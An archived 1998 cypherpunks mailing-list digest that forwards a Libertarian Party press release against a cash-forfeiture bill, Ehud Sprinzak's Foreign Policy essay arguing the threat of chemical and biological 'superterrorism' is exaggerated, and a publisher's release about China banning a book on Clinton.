For additional information:
George Getz, Press Secretary
Phone: (202) 333-0008 Ext. 222
E-Mail: 76214.3676@Compuserve.com
=======================================


New bill will allow police to "steal cash"
from travelers, warns Libertarian Party

        WASHINGTON, DC -- It may soon be a crime to get on a plane or
drive down the highway in America with too much money, the Libertarian
Party warned today.

        That's because a bill before the Senate Judiciary Committee
would allow police to assume that anyone traveling with more than
$10,000 in cash in so-called "drug transit areas" is a drug dealer --
and confiscate all their money.

        "Tourists and business travelers, take note: You may soon have
to fear being mugged by your own government," warned Steve Dasbach,
Libertarian Party national director.

        "Your government wants the power to label you a criminal and
seize all your money with no proof that you've committed a crime. In
other words, your government is about to give police a license to
steal."

        The bill in question -- the Drug Currency Forfeitures Act -- is
sponsored by Senators Max Cleland (D-GA) and Charles Grassley (R-IA).
The senators say their bill is designed to "hit drug dealers where it
hurts the most: In the wallet."

        The bill allows police to seize cash from any American
traveling through a drug transit area -- defined as an airport,
highway, or port of entry -- and would force citizens to go to court to
try to get the money back.

        "Accusations without proof? Punishments without trials? Welcome
to America in 1998," said Dasbach. "With this bill, two U.S. Senators
want to gut the Constitution -- and strip away fundamental rights like
the presumption of innocence and the right to carry money without
having to explain your actions to the government."

        One of the most repugnant provisions of the bill, Dasbach said,
is that people who want their money back will face a "rebuttable
presumption" of guilt. In other words, they most prove they are
innocent.

        "Senator Cleland complained that courts frequently throw out
money-laundering cases for lack of evidence, so his innovative solution
was to stop requiring evidence -- and simply allow police to steal your
money," Dasbach said. "Instead of the government proving that you are
guilty, you must prove that you are innocent."

        But why would anyone carry around $10,000 in cash, if they're
not a drug dealer?

        "It's none of the government's business -- period," Dasbach
said. "The idea that any American should have to explain to the police
where their money came from is offensive, and the idea that the police
can pocket your money if they don't like your answers is downright
criminal."

        In previous well-documented cases, he noted, the government has
seized money from a business traveler who had planned major cash
purchases for his company, and from a foreign-born American who was
bringing cash to relatives in another country. In both cases, the
courts ruled that the seizure was improper, and the victims got most of
their money back from the government.

        This bill would reverse those kinds of cases, Dasbach
predicted, by essentially creating a new type of crime: Driving While
Rich and Flying While Affluent -- all in the name of the War on Drugs.

        "What the Drug Currency Forfeitures Act really shows is that
once again, the War on Drugs has become an all-purpose excuse for a War
on Your Rights, such as the right to a fair trial and the right to get
on an airplane or drive down the highway without having to explain
yourself to a policeman," Dasbach said. "If Americans don't put a stop
to this, the politicians will not only steal all our money -- they will
also steal all our Constitutional rights."


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNhFZS9CSe1KnQG7RAQFoYAP9FWTe+KnZxM3QD0X9Ds7I3AgxpNWh3FL5
DRuXH4dzjg+WC/bVZen8eQV8C3ki+/EjHyv56x42W7cv3/PIXUqmoaO1F9a+3Snd
cEfE9g264XqRkkxybJ+FCi5AEhnGDzlHnkFPzzYgAwjjsKR1D8LZbsMEys2FxIMH
cQrBmpX9FNU=
=vDqn
-----END PGP SIGNATURE-----

The Libertarian Party                         http://www.lp.org/
2600 Virginia Ave. NW, Suite 100             voice: 202-333-0008
Washington DC 20037                            fax: 202-333-0072






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 30 Sep 1998 16:40:11 +0800
To: cypherpunks@cyberpass.net
Subject: IP: The Great Superterrorism Scare
Message-ID: <199809302133.OAA25675@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: The Great Superterrorism Scare
Date: Wed, 30 Sep 1998 09:03:50 -0500
To: believer@telepath.com

Forwarded:
----------------------
Subject: The Great Superterrorism Scare 
From: RoadsEnd@AOL.COM - Sept. 29, 1998 (Thanks for all your research)
      http://www.geocities.com/CapitolHill/2807/

The Great Superterrorism Scare
http://www.jya.com/superterror.htm

28 September 1998 - Source: Foreign Policy, Fall, 1998, pp. 110-124. 
Thanks to the author and Foreign Policy. http://www.foreignpolicy.com
---------------------------------------------------------------------------
The Great Superterrorism Scare - http://www.jya.com/superterror.htm

by Ehud Sprinzak

     EHUD SPRINZAK is professor of political science at Hebrew
     University of Jerusalem. This article was written under the
     auspices of the United States Institute of Peace where he spent
     the last year as a senior scholar with the Jennings Randolph
     program.

Last March, representatives from more than a dozen U.S. federal agencies
gathered at the White House for a secret simulation to test their readiness
to confront a new kind of terrorism. Details of the scenario unfolded a
month later on the front page of the New York Times: Without warning,
thousands across the American Southwest fall deathly ill. Hospitals
struggle to rush trained and immunized medical personnel into crisis areas.
Panic spreads as vaccines and antibiotics run short--and then run out. The
killer is a hybrid of smallpox and the deadly Marburg virus, genetically
engineered and let loose by terrorists to infect hundreds of thousands
along the Mexican-American border.

This apocalyptic tale represents Washington's newest nightmare: the threat
of a massive terrorist attack with chemical, biological, or nuclear
weapons. Three recent events seem to have convinced the policymaking elite
and the general public that a disaster is imminent: the 1995 nerve gas
attack on a crowded Tokyo subway station by the Japanese millenarian cult
Aum Shinrikyo; the disclosure of alarming new information about the former
Soviet Union's massive biowarfare program; and disturbing discoveries about
the extent of Iraqi president Saddam Hussein's hidden chemical and
biological arsenals. Defense Secretary William Cohen summed up well the
prevailing mood surrounding mass-destruction terrorism: "The question is no
longer if this will happen, but when."

Such dire forecasts may make for gripping press briefings, movies, and
bestsellers, but they do not necessarily make for good policy. As an
unprecedented fear of mass-destruction terrorism spreads throughout the
American security establishment, governments worldwide are devoting more
attention to the threat. But as horrifying as this prospect may be, the
relatively low risks of such an event do not justify the high costs now
being contemplated to defend against it. Not only are many of the
countermeasures likely to be ineffective, but the level of rhetoric and
funding devoted to fighting superterrorism may actually advance a potential
superterrorist's broader goals: sapping the resources of the state and
creating a climate of panic and fear that can amplify the impact of any
terrorist act.

CAPABILITIES AND CHAOS

Since the Clinton administration issued its Presidential Decision Directive
on terrorism in June 1995, U.S. federal, state, and local governments have
heightened their efforts to prevent or respond to a terrorist attack
involving weapons of mass destruction. A report issued in December 1997 by
the National Defense Panel, a commission of experts created by
congressional mandate, calls upon the army to shift its priorities and
prepare to confront dire domestic threats. The National Guard and the U.S.
Army Reserve must be ready, for example, to "train local authorities in
chemical- and biological-weapons detection, defense, and decontamination;
assist in casualty treatment and evacuation; quarantine, if necessary,
affected areas and people; and assist in restoration of infrastructure and
services." In May, the Department of Defense announced plans to train
National Guard and reserve elements in every region of the country to carry
out these directives.

In his 1998 State of the Union address, President Bill Clinton promised to
address the dangers of biological weapons obtained by "outlaw states,
terrorists, and organized criminals." Indeed, the president's budget for
1999, pending congressional approval, devotes hundreds of millions of
dollars to superterrorism response and recovery programs, including large
decontamination units, stockpiles of vaccines and antibiotics, improved
means of detecting chemical and biological agents and analyzing disease
outbreaks, and training for special intervention forces. The FBI, Pentagon,
State Department, and U.S. Health and Human Services Department will
benefit from these funds, as will a plethora of new interagency bodies
established to coordinate these efforts. Local governments are also joining
in the campaign. Last April, New York City officials began monitoring
emergency room care in search of illness patterns that might indicate a
biological or chemical attack had occurred. The city also brokered deals
with drug companies and hospitals to ensure an adequate supply of medicine
in the event of such an attack. Atlanta, Denver, Los Angeles, San
Francisco, and Washington are developing similar programs with state and
local funds. If the proliferation of counterterrorism programs continues at
its present pace, and if the U.S. army is indeed redeployed to the home
front, as suggested by the National Defense Panel, the bill for these
preparations could add up to tens of billions of dollars in the coming
decades.

Why have terrorism specialists and top government officials become so
obsessed with the prospect that terrorists, foreign or homegrown, will soon
attempt to bring about an unprecedented disaster in the United States? A
close examination of their rhetoric reveals two underlying assumptions:

The Capabilities Proposition. According to this logic, anyone with access
to modem biochemical technology and a college science education could
produce enough chemical or biological agents in his or her basement to
devastate the population of London, Tokyo, or Washington. The raw materials
are readily available from medical suppliers, germ banks, university labs,
chemical-fertilizer stores, and even ordinary pharmacies. Most policy today
proceeds from this assumption.

The Chaos Proposition. The post-Cold War world swarms with shadowy
extremist groups, religious fanatics, and assorted crazies eager to launch
a major attack on the civilized world--preferably on U.S. territory. Walter
Laqueur, terrorism's leading historian, recently wrote that "scanning the
contemporary scene, one encounters a bewildering multiplicity of terrorist
and potentially terrorist groups and sects." Senator Richard Lugar agrees:
"fanatics, small disaffected groups and subnational factions who hold
various grievances against governments, or against society, all have
increasing access to, and knowledge about the construction of, weapons of
mass destruction.... Such individuals are not likely to he deterred . . .
by the classical threat of overwhelming retaliation."

There is, however, a problem with this two-part logic. Although the
capabilities proposition is largely valid--albeit for the limited number of
terrorists who can overcome production and handling risks and develop an
efficient means of dispersal--the chaos proposition is utterly false.
Despite the lurid rhetoric, a massive terrorist attack with nuclear,
chemical, or biological weapons is hardly inevitable. It is not even
likely. Thirty years of field research have taught observers of terrorism a
most important lesson: Terrorists wish to convince us that they are capable
of striking from anywhere at anytime, but there really is no chaos. In
fact, terrorism involves predictable behavior, and the vast majority of
terrorist organizations can be identified well in advance.

Most terrorists possess political objectives, whether Basque independence,
Kashmiri separatism, or Palestinian Marxism. Neither crazy nor stupid, they
strive to gain sympathy from a large audience and wish to live after
carrying out any terrorist act to benefit from it politically. As terrorism
expert Brian Jenkins has remarked, terrorists want lots of people watching,
not lots of people dead. Furthermore, no terrorist becomes a terrorist
overnight. A lengthy trajectory of radicalization and low-level violence
precedes the killing of civilians. A terrorist becomes mentally ready to
use lethal weapons against civilians only over time and only after he or
she has managed to dehumanize the enemy. From the Baader-Meinhoff group in
Germany and the Tamil Tigers in Sri Lanka to Hamas and Hizballah in the
Middle East, these features are universal.

Finally, with rare exceptions--such as the Unabomber--terrorism is a group
phenomenon. Radical organizations are vulnerable to early detection through
their disseminated ideologies, lesser illegal activities, and public
statements of intent. Some even publish their own World Wide Web sites.
Since the 1960s, the vast majority of terrorist groups have made clear
their aggressive intentions long before following through with violence.

We can draw three broad conclusions from these findings. First, terrorists
who threaten to kill thousands of civilians are aware that their chances
for political and physical survival are exceedingly slim. Their prospects
for winning public sympathy are even slimmer. Second, terrorists take time
to become dangerous, particularly to harden themselves sufficiently to use
weapons of mass destruction. Third, the number of potential suspects is
significantly less than doomsayers would have us believe. Ample early
warning signs should make effective interdiction of potential
superterrorists easier than today's overheated rhetoric suggests.

THE WORLD'S MOST WANTED

Who, then, is most likely to attempt a superterrorist attack? Historical
evidence and today's best field research suggest three potential profiles:

   * Religious millenarian cults, such as Japan's Aum Shinrikyo, that
     possess a sense of immense persecution and messianic frenzy and hold
     faith in salvation via Armageddon. Most known religious cults do not
     belong here. Millenarian cults generally seclude themselves and wait
     for salvation; they do not strike out against others. Those groups
     that do take action more often fit the mold of California's Heaven's
     Gate, or France's Order of the Solar Temple, seeking salvation through
     group suicide rather than massive violence against outsiders.

   * Brutalized groups that either burn with revenge following a genocide
     against their nation or face the prospect of imminent destruction
     without any hope for collective recovery. The combination of
     unrestrained anger and total powerlessness may lead such groups to
     believe that their only option is to exact a horrendous price for
     their loss. "The Avengers," a group of 50 young Jews who fought the
     Nazis as partisans during World War II, exemplifies the case.
     Organized in Poland in 1945, the small organization planned to poison
     the water supply of four German cities to avenge the Holocaust.
     Technical problems foiled their plan, but a small contingent still
     succeeded in poisoning the food of more than 2,000 former SS storm
     troopers held in prison near Nuremberg.

   * Small terrorist cells or socially deranged groups whose alienated
     members despise society, lack realistic political goals, and may
     miscalculate the consequences of developing and using chemical or
     biological agents. Although such groups, or even individual "loners,"
     cannot be totally dismissed, it is doubtful that they will possess the
     technical capabilities to produce mass destruction.

Groups such as Hamas, Hizballah, and Islamic Jihad, which so many Americans
love to revile--and fear--do not make the list of potential
superterrorists. These organizations and their state sponsors may loathe
the Great Satan, but they also wish to survive and prosper politically.
Their leaders, most of whom are smarter than the Western media implies,
understand that a Hiroshima-like disaster would effectively mean the end of
their movements.

Only two groups have come close to producing a superterrorism catastrophe:
Aum Shinrikyo and the white supremacist and millenarian American Covenant,
the Sword and the Arm of the Lord, whose chemical-weapons stockpile was
seized by the FBI in 1985 as they prepared to hasten the coming of the
Messiah by poisoning the water supplies of several U.S. cities. Only Aum
Shinrikyo fully developed both the capabilities and the intent to take tens
of thousands of lives. However, this case is significant not only because
the group epitomizes the kind of organizations that may resort to
superterrorism in the future, but also because Aum's fate illustrates how
groups of this nature can be identified and their efforts preempted.

Although it comes as no comfort to the 12 people who died in Aum
Shinrikyo's attack, the cult's act of notoriety represents first and
foremost a colossal Japanese security blunder. Until Japanese police
arrested its leaders in May 1995, Aum Shinrikyo had neither gone
underground nor concealed its intentions. Cult leader Shoko Asahara had
written since the mid-1980s of an impending cosmic cataclysm. By 1995, when
Russian authorities curtailed the cult's activities in that country, Aum
Shinrikyo had established a significant presence in the former Soviet
Union, accessed the vibrant Russian black market to obtain various
materials, and procured the formulae for chemical agents. In Japan, Asahara
methodically recruited chemical engineers, physicists, and biologists who
conducted extensive chemical and biological experiments in their lab and on
the Japanese public. Between 1990 and 1994, the cult tried six
times--unsuccessfully--to execute biological-weapons attacks, first with
botulism and then with anthrax. In June 1994, still a year before the
subway gas attack that brought them world recognition, two sect members
released sarin gas near the judicial building in the city of Matsumoto,
killing seven people and injuring 150, including three judges.

In the years preceding the Tokyo attack, at least one major news source
provided indications of Aum Shinrikyo's proclivity toward violence. In
October 1989, the Sunday Mainichi magazine began a seven-part series on the
cult that showed it regularly practiced a severe form of coercion on
members and recruits. Following the November 1989 disappearance of a
lawyer, along with his family, who was pursuing criminal action against the
cult on behalf of former members, the magazine published a follow-up
article. Because of Japan's hypersensitivity to religious freedom, lack of
chemical- and biological-terrorism precedents, and low-quality domestic
intelligence, the authorities failed to prevent the Tokyo attack despite
these ample warning signs.

ANATOMY OF AN OBSESSION

lf a close examination reveals that the chances of a successful
superterrorist attack are minimal, why are so many people so worried? There
are three major explanations:

Sloppy Thinking

Most people fail to distinguish among the four different types of
terrorism: mass-casualty terrorism, state-sponsored chemical- or
biological-weapons (CBW) terrorism, small-scale chemical or biological
terrorist attacks, and superterrorism. Pan Am 103, Oklahoma City, and the
World Trade Center are all examples of conventional terrorism designed to
kill a large number of civilians. The threat that a "rogue state," a
country hostile to the West, will provide terrorist groups with the funds
and expertise to launch a chemical or biological attack falls into another
category: state-sponsored CBW terrorism. The use of chemical or biological
weapons for a small-scale terrorist attack is a third distinct category.
Superterrorism--the strategic use of chemical or biological agents to bring
about a major disaster with death tolls ranging in the tens or hundreds of
thousands--must be distinguished from all of these as a separate threat.

Today's prophets of doom blur the lines between these four distinct
categories of terrorism. The world, according to their logic, is
increasingly saturated with weapons of mass destruction and with terrorists
seeking to use them, a volatile combination that will inevitably let the
superterrorism genie out of the bottle. Never mind that the only place
where these different types of terrorism are lumped together is on
television talk shows and in sensationalist headlines.

In truth, the four types of terrorism are causally unrelated. Neither
Saddam Hussein's hidden bombs nor Russia's massive stockpiles of pathogens
necessarily bring a superterrorist attack on the West any closer. Nor do
the mass-casualty crimes of Timothy McVeigh in Oklahoma City or the World
Trade Center bombing. The issue is not CBW quantities or capabilities but
rather group mentality and psychological motivations. In the final
analysis, only a rare, extremist mindset completely devoid of political and
moral considerations will consider launching such an attack.

Vested Interests

The threat of superterrorism is likely to make a few defense contractors
very rich and a larger number of specialists moderately rich as well as
famous. Last year, Canadian-based Dycor Industrial Research Ltd. unveiled
the CB Sentry, a commercially available monitoring system designed to
detect contaminants in the air, including poison gas. Dycor announced plans
to market the system for environmental and antiterrorist applications. As
founder and president Hank Mottl explained in a press conference, "Dycor is
sitting on the threshold of a multi-billion dollar world market." In
August, a New York Times story on the Clinton administration's plans to
stockpile vaccines around the country for civilian protection noted that
two members of a scientific advisory panel that endorsed the plan
potentially stood to gain financially from its implementation. William
Crowe, former chair of the joint chiefs of staff, is also bullish on the
counterterrorism market. He is on the board of an investment firm that
recently purchased Michigan Biologic Products Institute, the sole maker of
an anthrax vaccine. The lab has already secured a Pentagon contract and
expects buyers from around the world to follow suit. As for the expected
bonanza for terrorism specialists, consultant Larry Johnson remarked last
year to U.S. News & World Report, "It's the latest gravy train."

Within the U.S. government, National Security Council experts, newly
created army and police intervention forces, an assortment of energy and
public-health units and officials, and a significant number of new
Department of Defense agencies specializing in unconventional terrorism
will benefit from the counterterrorism obsession and megabudgets in the
years ahead. According to a September 1997 report by the General Accounting
office, more than 40 federal agencies have been involved already in
combating terrorism. It may yet be premature to announce the rise of a new
"military-scientific-industrial complex," but some promoters of the
superterrorism scare seem to present themselves as part of a coordinated
effort to save civilization from the greatest threat of the twenty-first
century.

Morbid Fascination

Suspense writers, publishers, television networks, and sensationalist
journalists have already cashed in on the superterrorism craze. Clinton
aides told the New York Times that the president was so alarmed by
journalist Richard Preston's depiction of a superterrorist attack in his
novel The Cobra Event that he passed the book to intelligence analysts and
House Speaker Newt Gingrich for review. But even as media outlets spin the
new frenzy out of personal and financial interests, they also respond to
the deep psychological needs of a huge audience. People love to be
horrified. In the end, however, the tax-paying public is likely to be the
biggest loser of the present scare campaign. All terrorists--even those who
would never consider a CBW attack--benefit from such heightened attention
and fear.

COUNTERTERRORISM ON A SHOESTRING

There is, in fact, a growing interest in chemical and biological weapons
among terrorist and insurgent organizations worldwide for small-scale,
tactical attacks. As far back as 1975, the Symbionese Liberation Army
obtained instructions on the development of germ warfare agents to enhance
their "guerrilla" actions. More recently, in 1995, four members of the
Minnesota Patriots Council, an antitax group that rejected all forms of
authority higher than the state level, were convicted of possession of a
biological agent for use as a weapon. Prosecutors contended that the men
conspired to murder various federal and county officials with a supply of
the lethal toxin ricin they had developed with the aid of an instruction
kit purchased through a right-wing publication. The flourishing mystique of
chemical and biological weapons suggests that angry and alienated groups
are likely to manipulate them for conventional political purposes. And
indeed, the number of CBW threats investigated by the FBI is increasing
steadily. But the use of such weapons merely to enhance conventional
terrorism should not prove excessively costly to counter.

The debate boils down to money. If the probability of a large-scale attack
is extremely small, fewer financial resources should be committed to
recovering from it. Money should be allocated instead to early warning
systems and preemption of tactical chemical and biological terrorism. The
security package below stresses low-cost intelligence, consequence
management and research, and a no-cost, prudent counterterrorism policy.
Although tailored to the United States, this program could form the basis
for policy in other countries as well:

   * International deterrence. The potential use of chemical and biological
     weapons for enhanced conventional terrorism, and the limited risk of
     escalation to superterrorism, call for a reexamination of the existing
     U.S. deterrence doctrine--especially of the evidence required for
     retaliation against states that sponsor terrorism. The United States
     must relay a stern, yet discreet message to states that continue to
     support terrorist organizations or that disregard the presence of
     loosely affiliated terrorists within their territory: They bear direct
     and full responsibility for any future CBW attack on American targets
     by the organizations they sponsor or shelter. They must know that any
     use of weapons of mass destruction by their clients against the United
     States will constitute just cause for massive retaliation against
     their countries, whether or not evidence proves for certain that they
     ordered the attack.

   * Domestic deterrence. There is no question that the potential use of
     chemical and biological weapons for low-level domestic terrorism adds
     a new and dangerous dimension to conventional terrorism. There is
     consequently an urgent need to create a culture of domestic deterrence
     against the nonscientific use of chemical and biological agents. The
     most important task must be accomplished through legislation. Congress
     should tighten existing legislation against domestic production and
     distribution of biological, chemical, and radiological agents and
     devices.

     The Anti-Terrorism Act of 1996 enlarged the federal criminal code to
     include within its scope a prohibition on any attempts, threats, and
     conspiracies to acquire or use biological agents, chemical agents, and
     toxins. It also further redefined the terms "biological agent" and
     "toxin" to cover a number of products that may be bioengineered into
     threatening agents. However, the legislation still includes the
     onerous burden of proving that these agents were developed for use as
     weapons. Take the case of Larry Wayne Harris, an Ohio man arrested in
     January by the FBI for procuring anthrax cultures from an unknown
     source. Harris successfully defended his innocence by insisting that
     he obtained the anthrax spores merely to experiment with vaccines. He
     required no special permit or license to procure toxins that could be
     developed into deadly agents. The FBI and local law enforcement
     agencies should be given the requisite authority to enforce existing
     laws as well as to act in cases of clear and present CBW danger, even
     if the groups involved have not yet shown criminal intent. The
     regulations regarding who is allowed to purchase potentially
     threatening agents should also be strengthened.

     A campaign of public education detailing the dangers and illegality of
     nonscientific experimentation in chemical and biological agents would
     also be productive. This effort should include, for example, clear and
     stringent university policies regulating the use of school
     laboratories and a responsible public ad campaign explaining the
     serious nature of this crime. A clear presentation of the new threat
     as another type of conventional terrorism would alert the public to
     groups and individuals who experiment illegitimately with chemical and
     biological substances and would reduce CBW terrorism hysteria.

   * Better Intelligence. As is currently the case, the intelligence
     community should naturally assume the most significant role in any
     productive campaign to stop chemical and biological terrorism.
     However, new early warning CBW indicators that focus on radical group
     behavior are urgently needed. Analysts should be able to reduce
     substantially the risk of a CBW attack if they monitor group
     radicalization as expressed in its rhetoric, extralegal operations,
     low-level violence, growing sense of collective paranoia, and early
     experimentation with chemical or biological substances. Proper CBW
     intelligence must be freed from the burden of proving criminal intent.

   * Smart and compact consequence management teams. The threat of
     conventional CBW terrorism requires neither massive preparations nor
     large intervention forces. It calls for neither costly new
     technologies nor a growing number of interagency coordinating bodies.
     The decision to form and train joint-response teams in major U.S.
     cities, prompted by the 1995 Presidential Decision Directive on
     terrorism, will be productive if the teams are kept within proper
     proportions. The ideal team would be streamlined so as to minimize the
     interagency rivalry that has tended to make these teams grow in size
     and complexity. In addition to FBI agents, specially trained local
     police, detection and decontamination experts, and public-health
     specialists, these compact units should include psychologists and
     public-relations experts trained in reducing public hysteria.

   * Psychopolitical research. The most neglected means of countering CBW
     terrorism is psychopolitical research. Terrorism scholars and U.S.
     intelligence agencies have thus far failed to discern the
     psychological mechanisms that may compel terrorists to contemplate
     seriously the use of weapons of mass destruction. Systematic group and
     individual profiling for predictive purposes is almost unknown.
     Whether in Europe, Latin America, the Middle East, or the United
     States, numerous former terrorists and members of radical
     organizations are believed to have considered and rejected the use of
     weapons of mass destruction. To help us understand better the
     considerations involved in the use or non-use of chemical and
     biological weapons, well-trained psychologists and terrorism
     researchers should conduct a three-year, low-cost, comprehensive
     project of interviewing these former radicals.

   * Reducing unnecessary superterrorism rhetoric. Although there is no way
     to censor the discussion of mass-destruction terrorism, President
     Clinton, his secretaries, elected politicians at all levels,
     responsible government officials, writers, and journalists must tone
     down the rhetoric feeding today's superterrorism frenzy.

There is neither empirical evidence nor logical support for the growing
belief that a new "postmodem" age of terrorism is about to dawn, an era
afflicted by a large number of anonymous mass murderers toting chemical and
biological weapons. The true threat of superterrorism will not likely come
in the form of a Hiroshima-like disaster but rather as a widespread panic
caused by a relatively small CBW incident involving a few dozen fatalities.
Terrorism, we must remember, is not about killing. It is a form of
psychological warfare in which the killing of a small number of people
convinces the rest of us that we are next in line. Rumors, anxiety, and
hysteria created by such inevitable incidents may lead to panic-stricken
evacuations of entire neighborhoods, even cities, and may produce many
indirect fatalities. It may also lead to irresistible demands to fortify
the entire United States against future chemical and biological attacks,
however absurd the cost.

Americans should remember the calls made in the 1950s to build shelters,
conduct country-wide drills, and alert the entire nation for a first-strike
nuclear attack. A return to the duck-and-cover absurdities of that time is
likely to be as ineffective and debilitating now as it was then. Although
the threat of chemical and biological terrorism should be taken seriously,
the public must know that the risk of a major catastrophe is extremely
minimal. The fear of CBW terrorism is contagious: Other countries are
already showing increased interest in protecting themselves against
superterrorism. A restrained and measured American response to the new
threat may have a sobering effect on CBW mania worldwide.

                           Setting the FBI Free

  When members of the Japanese cult Aum Shinrikyo went shopping in the
  United States, they were not looking for cheap jeans or compact discs.
  They were out to secure key ingredients for a budding chemical-weapons
  program--and they went unnoticed. Today, more FBI agents than ever are
  working the counterterrorism beat: double the number that would-be
  superterrorists had to contend with just a few years ago. But is the
  FBI really better equipped now than it was then to discover and preempt
  such terrorist activity in its earliest stages?

  FBI counterterrorism policy is predicated on guidelines issued in 1983
  hy then-U.S. attorney general William French Smith: The FBI can open a
  full investigation into a potential act of terrorism only "when facts
  or circumstances reasonably indicate that two or more persons are
  engaged in activities that involve force or violence and a violation of
  the criminal laws of the United States." Short of launching a full
  investigation, the FBI may open a preliminary inquiry if it learns from
  any source that a crime might be committed and determines that the
  allegation "requires some further scrutiny." This ambiguous phrasing
  allows the FBI a reasonable degree of latitude in investigating
  potential terrorist activity.

  However, without a lead--whether an anonymous tip or a public news
  report--FBI agents can do little to gather intelligence on known or
  potential terrorists. Agents cannot even download information from
  World Wide Web sites or clip newspapers to track fringe elements. The
  FBI responds to leads; it does not ferret out potential threats.
  Indeed, in an interview with the Center for National Security Studies,
  one former FBI official griped, "You have to wait until you have blood
  on the street before the Bureau can act."

  CIA analysts in charge of investigating foreign terrorist threats comb
  extensive databanks on individuals and groups hostile to the United
  States. American citizens are constitutionally protected against this
  sort of intrusion. A 1995 presidential initiative intended to increase
  the FBI's authority to plant wiretaps, deport illegal aliens suspected
  of terrorism, and expand the role of the military in certain kinds of
  cases was blocked by Congress. Critics have argued that the costs of
  such constraints on law enforcement may he dangerously
  high--reconsidering them would be one of the most effective (and
  perhaps least expensive) remedies against superterrorism.

---------------------------------------------------------------------------

WANT TO KNOW MORE?

Brian Jenkins first makes his well-known argument that terrorists want a
lot of people watching, not a lot of people dead, in "Will Terrorists Go
Nuclear?" (Orbis, Autumn 1985). More recently, Jenkins provides a reasoned
analysis of weapons-of-mass-destruction (WMD) terrorism in the aftermath of
the Tokyo subway attack in "The Limits of Terror: Constraints on the
Escalation of Violence" (Harvard International Review, Summer 1995). For a
counter argument, see Robert Kupperman's "A Dangerous Future: The
Destructive Potential of Criminal Arsenals" in the same issue. Ron Purver
reviews the literature on superterrorism and weighs the opportunities for,
and constraints on, terrorists considering a WMD attack in "Chemical and
Biological Terrorism: New Threat to Public Safety?" (Conflict Studies,
December 1996/January 1997). Jerrold Post and Ehud Sprinzak stress the
psychopolitical considerations inhibiting potential WMD terrorists in "Why
Haven't Terrorists Used Weapons of Mass Destruction?" (Armed Forces
Journal, April 1998). For a solid compilation of essays on superterrorism,
see Brad Roberts, ed., Terrorism with Chemical and Biological Weapons:
Calibrating Risks and Responses (Alexandria: Chemical and Biological Arms
Control Institute, 1997). Walter Laqueur surveys the history of terrorism
and finds an alarming number of barbarians at the gate in "Postmodern
Terrorism" (Foreign Affairs, September/October 1996). John Deutch takes a
counterintuitive look at the subject in "Think Again: Terrorism" (FOREIGN
POLICY, Fall 1997). Finally, David Kaplan provides the best available study
of Aum Shinrikyo in his excellent book The Cult at the End of the World:
The Terrifying Story of the Aum Doomsday Cult, from the Subways of Tokyo to
the Nuclear Arsenals of Russia (New York: Crown Publishers, 1996).

The World Wide Web provides a number of resources for superterrorism
research. The Carnegie Endowment for International Peace's Nonproliferation
Project and the Henry L. Stimson Center provide regular coverage of
nuclear-, chemical-, and biological-weapons issues, including terrorism.
The Federation of American Scientists publishes a wealth of government
documents as well as excellent news and analysis pertaining to weapons of
mass destruction. And the State Department's "Patterns of Global Terrorism"
provides one-stop shopping for information on some of the world's more
notorious organizations.

For links to these and other Web sites, as well as a comprehensive index of
related articles, access http://www.foreignpolicy.com.

[End]

---------------------------------------------------------------------------
Also see:

Money Laundering -The BCCI Mystery Continues
Rose Attorney Hillary Rodham represented a Stephens
subsidiary, the Systematics bank-data processing firm.
http://www.aci.net/kalliste/

Judicial Watch's RICO case against Clinton
http://www.worldnetdaily.com/exclusiv/980929_judicial_watchs_cas.html

Clinton's secret war games
http://www.worldnetdaily.com/exclusiv/980929.exbre_clintons_secr.html

The War On Truth
http://www.worldnetdaily.com/smith/980929.comcs.html

Here you can examine the fairness of the UN climate change treaty....
http://www.climatefacts.org/

Bilderberg Conferences 
http://www.tlio.demon.co.uk/1998.htm

"....no conspiracy can survive expose'...."
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 30 Sep 1998 16:38:58 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Chinese Govt Bans Controversial Clinton Book
Message-ID: <199809302133.OAA25687@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Chinese Govt Bans Controversial Clinton Book
Date: Wed, 30 Sep 1998 09:16:35 -0500
To: believer@telepath.com

Source:  US Newswire
http://www.usnewswire.com/topnews/Current_Releases/0929-126.txt

PRIMA: Chinese Government Bans Controversial Clinton Book
U.S. Newswire
29 Sep 15:06

 PRIMA Publishing: Chinese Government Bans Controversial Clinton
Book
 To: National Desk
 Contact: Diana Banister of Craig Shirley & Associates,
          800-536-5920, pager: 703-816-9368

   WASHINGTON, Sept. 29 /U.S. Newswire/ -- The following was released
today by Prima Publishing:

   Chinese authorities have refused to allow three publishing
houses to translate a new book -- "The Clinton Syndrome, The
President and the Self-Destructive Nature of Sexual Addiction" by
California-based Prima Publishing. The book takes a clinical look
at the life and behavior of Bill Clinton and explains why the
president would risk his presidency for a sexual relationship with
an intern.

   "We have been told that the Chinese government does not want to
make a book of this kind available in China because they consider
it unfavorable to President Clinton," says Robin Taylor, rights
associate at Prima Publishing. "The Chinese authorities apparently
don't understand why Americans treat their president just like any
other person and allow citizens to write about their government
leaders."

   In "The Clinton Syndrome," Jerome D. Levin, Ph.D., a
psychotherapist, addictions specialist and professor, assesses the
character of a man so driven by a sexual addiction that he would
risk his presidency to fulfill a desperate need for reassurance and
validation of his worth.

   Prima does not consider the Clinton Syndrome an "anti-Clinton"
book. In fact, Dr. Levin voted for President Clinton twice and
agrees with his policies. But he still believes the president is in
serious need of help for a classic case of sexual addiction.

   "We work with foreign publishers around the world on numerous
books," says Taylor. "Never have we had the subject matter of
a book impede its publication in a foreign country. But I guess
it's understandable when you consider the relationship between the
Clinton administration and the current Chinese government."

